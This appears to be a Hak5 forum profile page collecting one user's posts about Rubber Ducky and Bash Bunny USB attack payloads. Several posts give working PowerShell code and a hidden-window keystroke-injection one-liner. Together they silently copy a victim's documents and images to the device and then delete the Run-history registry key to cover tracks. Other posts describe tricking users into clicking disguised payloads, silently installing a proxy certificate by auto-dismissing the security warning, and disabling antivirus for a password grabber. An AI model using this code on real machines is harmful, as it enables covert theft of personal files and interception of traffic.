Jump to content
Hak5 Forums


Active Members
  • Content count

  • Joined

  • Last visited

  • Days Won



About PoSHMagiC0de

  • Rank
    Hak5 Pirate

Contact Methods

  • Website URL
  1. A help to simplify playloads

    Sorry for the late response. Busy guy. Yeah, you shouldn't have to change the execution policy. I test all my scripts on restricted. Reason it should work is you are not (technically) running a script. The powershell line actually is an inline command so will run even with restricted policy. In the powershell one liners I am not running the other script but reading in the contents as a string and then running it as an expression. I looked through your steps i see you maybe missing 1 final step. Grab the script Invoke-SMBExfil.ps1 from my BBTPS project in my repo. I linked it in the thread above. The duckexfil uses that script to do its thing. So you need that DuckExfil.ps1 and Invoke-SMBExfil.ps1 in the same folder.
  2. how to open folder on target as decoy then script?

    Still, no can do without noticeable interaction. The PC will need to be told to be a client some how on the pc. You can run all the stuff you want on the bunny but it is like another machine physically separated from the PC even though it is plugged into the usb port. Unless there is a service on that PC that is looking for something to come up on the USB port that it wants to interact with. Network is same thing, you need a network service to interact with, credentials most likely for that service or an exploit. Only device that can immediately interact directly with the PC the BB can do is HID but it is visible.
  3. how to open folder on target as decoy then script?

    vbs, ps1, compiled exe in native or .net, you can make them all silent. Question is how is the payload firing off while they are looking at pictures? I avoided this topic because I knew it would be a rabbit hole. Here is why. So, how are the pic folders going to display. USB storage shows the whole UDisk and autorun no workie on USB flash drives. So, you need them to browse pictures on BB and not payloads or loot or all the other folders. Next, you need a way to execute the script. Quacking it will take control of the keyboard and start popping up stuff and typings. Only way I can see is tricking the user to click on a shortcut which would launch your payload and then show the pic folders but the question becomes how does the shortcut lnk file know what drive the BB was assigned to point at everything correctly. Of course you could use powershell to load an ad-hoc agent (yes I love calling the code that starts or facilitates a whole remote process as the agent) of your making to get the drive and all that, fire off the payload and then fire of an explorer process pointing to the now known drive of the BB and pictures. Ultimately, the BB is going to have to quack the payload or the user is going to have to click on a payload/launcher that maybe disguised as a pic to initiate the malware.
  4. how to open folder on target as decoy then script?

    Issue I see is how are you going to execute your script when the picture or whatever has focus. At any time if the victim is watching their machine they will see the quack commands because you will need the window you are typing them in to have focus. Them clicking off the window will break focus and break the payload.
  5. Bash Bunny Studio

    Nice. I was going to make a web interface for my project but.. was going to hand it over to Davee since he has that nice interface for the PS but I am on my own. Will have to check it out when I get time to see how flexible it is.
  6. A help to simplify playloads

    One line you do have to change is put in the name of the loot folder on the duck SSD. In the duckexfil file look for the $duckloot variable and it will have in quotes to enter the name of the folder to exfil to. It also assumes you have the scripts in a "payloads" folder right off the root of the ducky. If that is not the case, that folder name will need to be changed in the duckexfil also under the $payloaddir variable. I also mentioned I do not know what label twin duck gives itself when it mounts as storage so you will need to get that and change the 2 labels that have "-" in them to be the label twinduck gives. One is in the one line launcher and the other is in the duckexfil to get the duck drive. How it should work is the one liner launcher should launch powershell and get the drive the for the Twin duck, combine it with the "payloads\DuckExfil.ps1" file and use get-content encoding it all as string into memory and then outputting as one solid string rather than string array. (Posh 2.0 did not have the "-raw" switch for get-content to get files as is so it almost always return arrays that cannot be invoked as scripts so I pipe it to Out-String to make it a single string). Invokes that script which loads the function into memory. You then run the function that will build the paths in memory it needs to access the RD twinduck drive and perspective folders. You also build a list of file wildcards to get. With all that the script pulls in and invokes the smbexfil script which puts the function into memory and then it runs the function with parameters it needs. Now, if you wish to see it in action for testing, remove the "-w hidden" parameter from the launcher the window will not vanish. Good for testing to see if the script is running or quits immediately. I would also (for testing) monitor the duck folder to see if files are going there. Oh, the loot folder has to exist. Quick way to test is to just run the smbexfil script by itself on victim with RD plugged in with Storage available quacking nothing. You should see it and be able to hand run the script with parameters to copy maybe just text files to it. I do not have a RD anymore so unable to test with TD. Replaced with BashBunny so do not know how the TD does things but do not see why this is not working.
  7. A help to simplify playloads

    Man, been a busy week. Yeah, the script I recommended is to be used as almost a complete replacement to using CMD files. It takes inclusions as arrays and is completely powershell. What I meant by using it is on the RubberDucky you are limited to interactivity with your commands unlike the BB so with that script you will need to create a launcher script to keep the quack command small so it will be a two stager only so you can use the 1st stage as your config script. # This is DuckExfil.ps1 function Invoke-DuckExfil { $exfilfolder = "$env:userprofile\Documents\" $duckDrive = (gwmi -class win32_volume -f {label='-'}).Name $payloaddir = "payloads\" $duckpayloads = join-path $duckDrive $payloaddir $duckloot = join-path $duckdrive "loot folder on duck\" #Documents $docs = @("*.csv", "*.doc", "*.docx", "*.odt", "*.ods", "*.odg", "*.odp", "*.pdf", "*.pps", "*.txt", "*.tex", "*.ltx", "*.rtf", "*.xls", ".xlsx") #Images $img = @("*.gif", "*.jpg", "*.jpeg", "*.png", "*.tiff", "*.psd", "*.webp") #And other formats that I will not include because it is monotonous. #Combine into 1 arraylist $filetypes = [System.Collections.ArrayList]::new() $filetypes.Addrange($docs) $filetypes.Addrange($img) #Get the smbexfil script and run it with parameters. IEX (gc (join-path $duckpayloads "Invoke-SMBExfil.ps1") -encoding String | Out-String) Invoke-SMBExfil $exfilfolder $duckloot $filetypes $wsh = New-Object -ComObject WScript.Shell $wsh.SendKeys('{CAPSLOCK}') sleep -m 250 $wsh.SendKeys('{CAPSLOCK}') sleep -m 250 $wsh.SendKeys('{CAPSLOCK}') sleep -m 250 $wsh.SendKeys('{CAPSLOCK}') Remove-Item HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU } And the quack command should be something like this: STRING powershell -NoP -W hidden -C {$duck=(join-path (gwmi -class win32_volume -f "label='-'").Name "payloads\DuckExfil.ps1");IEX (gc $duck -encoding String | Out-String);Invoke-DuckExfil} I do not know what the twin duck label is so where the labels are at is what the label the RB twinduck shows up as. With the the ducky commands to launch a cmd window done first and then the string command above you should get the window disappearing and files copying ending with that keyboard light sequence when done. Config of paths and stuff done in the DuckExfil.ps1 file. Just showing another option.
  8. A help to simplify playloads

    I do not have my Rubber Duck anymore but have a BashBunny and a script in Powershell for smbexfiltration. It can be located in my BBTPS project at the link below. You just need create a oneline stager to get the patch to the Rubber ducky and then get-content the script, invoke it and then run the function with the base path to the files, path to where the files are going on the rubber ducky and an array of extensions or filenames you want from that folder. Of course all the extensions you want will make the command longer unless you build a wrapper script for it that will pass it all the extensions or modify the script to invoke the command at the end of it with the parameters. https://github.com/PoSHMagiC0de/BBTPS/tree/master/jobs/totalp0wn Yeah, it is called smbexfil but will take any kind of path you give it. Only called it that because I pass it a UNC path in the project to exfil via the SMB path to BB.
  9. So, this is a never ending adventure for me. Using dd in many different ways and the built in usb image writer in the Ubuntu like OSes I have tried to make bootable USBs from bootable ISO images. I would have to say it is hit and miss. The three methods I have tried are: 1) DD the whole disk with the image (/dev/sdb) 2) Create a partition on the USB stick and dding in there (/dev/sdb1) 3) Using the USB Stick reformatter and then USB image writer. Oh, I have also ran sync at the end of each to make sure the USB is synced before safely ejecting it. One of three above usually works but I have ran across some that do not work at all with the above methods. What I do know is if I jump on a Windows system and use Rufus portable it will always work. I mean it has never failed me. if the ISO is bootable, it will be bootable on the USB...always. Question, is there a 100% proven way to write a bootable ISO to a USB stick with Linux and have it be bootable? A good example of an ISO to try is Hiren's. That ISO would not bootup until I used Rufus to do it.
  10. Not one of the hak5 products is working properly

    Simple explanation for this situation is this. Although the computers in the library are for public use, they are owned by the library. When they break, the library has to requisition public funds to get it fix. Either they have to call in a contractor or the city IT department has to fix it. So, it has private ownership even if it is a public service. I know somewhere around that machine there is a terms of service. So, it would be like if my neighbors gave me money (taxes in gov terms), I used that money to put in a drinking fountain in my front yard that everyone can use (open to the public). If it has plumbing issues and stuff, I will have to pay to fix it since I bought it and am the owner..even if the neighbors help by giving more money. Ultimately it will be in my name (library machines are property of the library or city). So, does that mean I am not going to call the police if I see one of the neighborhood kids pissing in it? Does public use mean he can piss in it? Pretty much when you try and compromise the library machine or do anything outside the intended use of the service, you are essentially pissing in it and if you are caught they will call the police on you. Now, I would be weary about doing illegal things on those machines too. They are property of the city, in extension the gov. That means that traffic can be monitored by any number of agencies and the library has cameras. Your agent calls out at a certain time, they have that timestamped and camera footage of you sitting at the machine. Now they only have to find you. Plus, the most you will probably get from the machine at great risk is folks browsing porn sites. :-P
  11. [PAYLOAD] BunnyMute

    Oh, might as well show the other method too just in case. function Set-Mute { $wshell = new-object -ComObject wscript.shell $mutecmd = "`$wshell.SendKeys([char]174);" iex ("$mutecmd" * 100) } This turns the volume down by repeatedly hitting the keyboard volume down key 100x. No mixer popup or timings you have to worry about.
  12. [PAYLOAD] BunnyMute

    This can be reduced by including no shortcut or anything, just a script. Heck, it can even be quacked all out so not to require even a script file. function Set-Mute { IEX "sndvol.exe -f 49825268" $wshell = New-Object -ComObject wscript.shell sleep -Milliseconds 500 $wshell.SendKeys("{END}") $wshell.SendKeys("{ESCAPE}") } This can be onelined as: powershell.exe -NoP -W Hidden -C "IEX 'sndvol.exe -f 49825268';$wshell = New-Object -ComObject wscript.shell;sleep -Milliseconds 500;$wshell.SendKeys('{END}');$wshell.SendKeys('{ESCAPE}')" as a quack command it would look like this: Q STRING "powershell.exe -NoP -W Hidden -C \"IEX 'sndvol.exe -f 49825268';\$wshell = New-Object -ComObject wscript.shell;sleep -Milliseconds 500;\$wshell.SendKeys('{END}');\$wshell.SendKeys('{ESCAPE}')\"" The small sleep in the script is needed because it takes some time for sndvol.exe to launch and the script runs really fast. You can play with the delay if on a slower machine that takes it longer to launch. Probably 1 second would not be a bad all around-er. So, this I may use in the proxy script I am optimizing. This is the way I like to help. People build what they want, I like to come in a help by making it better. A lot better than doing it all for someone else and they walk away learning diddly. Good job discovering the exe that launches the mixer. Most would send the keystrokes for turning down the volume and just repeat it 50-100x's.
  13. [PAYLOAD] Proxy Interceptor

    Whoot. I perfected this payload, well almost. I am switching it back to file mode for the cert since you are pulling from USB. Less work and easier to deal with. I am too used to dealing with agents and agent servers that I over-complicated the pull of the cert. Going to simplify it from handling raw, in memory, data to handling the cert files. I also ran into an issue with PS2.0 compatibility but I know what to do to fix that really fast from a test I did here in the office. I can finish this off and have a fully working improved version of this payload either tonight or tomorrow. I have been working on the BBTPS after I got hung up with the security warning that cannot be select by hid commands but because I was being dense I saw it wasn't a UAC prompt meaning I still had control of the screen though the script does stop. No problem. I just added a job to fire off before adding the cert that waits a second or 2 so when I add the cert and the security warning pops up, the job selects the window via code and does an alt-y sendkey which worked. So, only 1 quack command and 2-3 seconds to run. Whoot. Could make it more stealthy by muting sound before adding cert so there is no warning sound and then unmute when done but that can be later. Where do you want this thing since it is really yours, I am just improving it? :-P Or, I will just be forkin ya.
  14. BBTPS upcoming updates

    Lol. I am camera shy and no video experience. There are guys at my local hackerspace that seem to enjoy doing videos and stuff. I may tag them to see if they want take up the project. :-P
  15. PasswordGrabber by LazaGne Not Working

    I haven't tested yet to see if "Set-MpPreference" affects all AV on the machine (like AVAST) or just Windows Defender.